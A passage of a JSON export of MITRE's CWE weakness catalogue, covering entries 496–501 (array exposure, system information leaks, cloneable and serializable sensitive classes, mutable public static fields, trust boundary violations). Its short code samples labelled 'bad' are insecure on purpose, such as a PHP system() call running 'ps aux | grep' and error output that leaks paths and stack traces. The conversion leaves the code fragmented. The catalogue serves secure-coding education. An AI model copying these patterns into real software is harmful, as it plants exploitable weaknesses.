Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Private Array-Typed Field Returned From A Public Method","attr":{"@_Date":"2019-01-03"}}}},"496":{"attr":{"@_ID":"496","@_Name":"Public Data Assigned to Private Array-Typed Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Assigning public data to a private array is equivalent to giving public access to the array.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The contents of the array can be modified from outside the intended scope."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not allow objects to modify private members of a class."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the setRoles() method assigns a publically-controllable array to a private field, thus allowing the caller to modify the private array directly by virtue of the fact that arrays in Java are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private String[] userRoles;public void setUserRoles(String[] userRoles) {}","xhtml:br":"","xhtml:div":{"#text":"this.userRoles = userRoles;","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Public Data Assigned to Private Array-Typed Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"497":{"attr":{"@_ID":"497","@_Name":"Exposure of Sensitive System Information to an Unauthorized Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the application does.","Extended_Description":{"xhtml:p":["Network-based software, such as web applications, often runs on top of an operating system or similar environment. When the application communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the application itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan.","An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts. An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code prints the path environment variable to the standard error stream:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* path = getenv(\\"PATH\\");...sprintf(stderr, \\"cannot find exe on path %s\\\\n\\", path);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"Intro_Text":"The following code prints an exception to the standard error stream:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"e.printStackTrace();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {} catch (Exception e) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"Console.Writeline(e);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."},{"Intro_Text":"The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"string cs=\\"database=northwind; server=mySQLServer...\\";SqlConnection conn=new SqlConnection(cs);...Console.Writeline(cs);","xhtml:br":["","",""]}},"Body_Text":"Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"System Information Leak"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"170"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"System Information Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak of System Data","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of System Data to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"498":{"attr":{"@_ID":"498","@_Name":"Cloneable Class Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class.","Extended_Description":"Cloneable classes are effectively open classes, since data cannot be hidden in them. Classes that do not explicitly deny cloning can be cloned by any other class without running the constructor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"A class that can be cloned can be produced without executing the constructor. This is dangerous since the constructor may perform security-related checks. By allowing the object to be cloned, those checks may be bypassed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you do make your classes clonable, ensure that your clone method is final and throw super.clone()."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class CloneClient {}class Teacher implements Cloneable {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public CloneClient() //throwsjava.lang.CloneNotSupportedException {}public static void main(String args[]) {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Teacher t1 = new Teacher(\\"guddu\\",\\"22,nagar road\\");//...// Do some stuff to remove the teacher.Teacher t2 = (Teacher)t1.clone();System.out.println(t2.name);","xhtml:br":["","","","",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new CloneClient();","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() {}public String name;public String clas;public Teacher(String name,String clas) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (java.lang.CloneNotSupportedException e) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"return super.clone();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new RuntimeException(e.toString());","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.name = name;this.clas = clas;","xhtml:br":["",""]}}]}}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public final void clone() throws java.lang.CloneNotSupportedException {}","xhtml:div":{"#text":"throw new java.lang.CloneNotSupportedException();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Make classes uncloneable by defining a clone function like:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through class cloning"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Class Cloning","attr":{"@_Date":"2011-03-29"}}}},"499":{"attr":{"@_ID":"499","@_Name":"Serializable Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class.","Extended_Description":"Serializable classes are effectively open classes since data cannot be hidden in them. Classes that do not explicitly deny serialization can be serialized by any other class, which can then in turn use the data stored inside it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"an attacker can write out the class to a byte stream, then extract the important data from it."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"In Java, explicitly define final writeObject() to prevent serialization. This is the recommended solution. Define the writeObject() function to throw an exception explicitly denying serialization."},{"Phase":"Implementation","Description":"Make sure to prevent serialization of your objects."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code creates a new record for a medical patient:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class PatientRecord {}","xhtml:div":{"#text":"private String name;private String socialSecurityNum;public Patient(String name,String ssn) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.SetName(name);this.SetSocialSecurityNumber(ssn);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This object does not explicitly deny serialization, allowing an attacker to serialize an instance of this object and gain a patient\'s name and Social Security number even though those fields are private."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER05-J","Entry_Name":"Do not serialize instances of inner classes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Serialization","attr":{"@_Date":"2008-04-11"}}}},"500":{"attr":{"@_ID":"500","@_Name":"Public Static Field Not Marked Final","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.","Extended_Description":"Public static variables can be read without an accessor and changed without a mutator by any classes in the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"493","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"When a field is declared public but not final, the field can be read and written to by arbitrary Java code."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Clearly identify the scope for all critical data elements, including whether they should be regarded as static."},{"Phase":"Implementation","Description":{"xhtml:p":["Make any static fields private and constant.","A constant field is denoted by the keyword \'const\' in C/C++ and \' final\' in Java"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples use of a public static String variable to contain the name of a property/configuration file for the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static const string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}}],"Body_Text":"Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Overflow of static internal buffer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"Significant clarification of this entry, and improved examples."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Overflow of Static Internal Buffer","attr":{"@_Date":"2008-04-11"}},{"#text":"Static Field Not Marked Final","attr":{"@_Date":"2008-11-24"}}]}},"501":{"attr":{"@_ID":"501","@_Name":"Trust Boundary Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product mixes trusted and untrusted data in the same data structure or structured message.","Extended_Description":"A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"usrname = request.getParameter(\\"usrname\\");if (session.getAttribute(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.setAttribute(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"usrname = request.Item(\\"usrname\\");if (session.Item(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.Add(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being 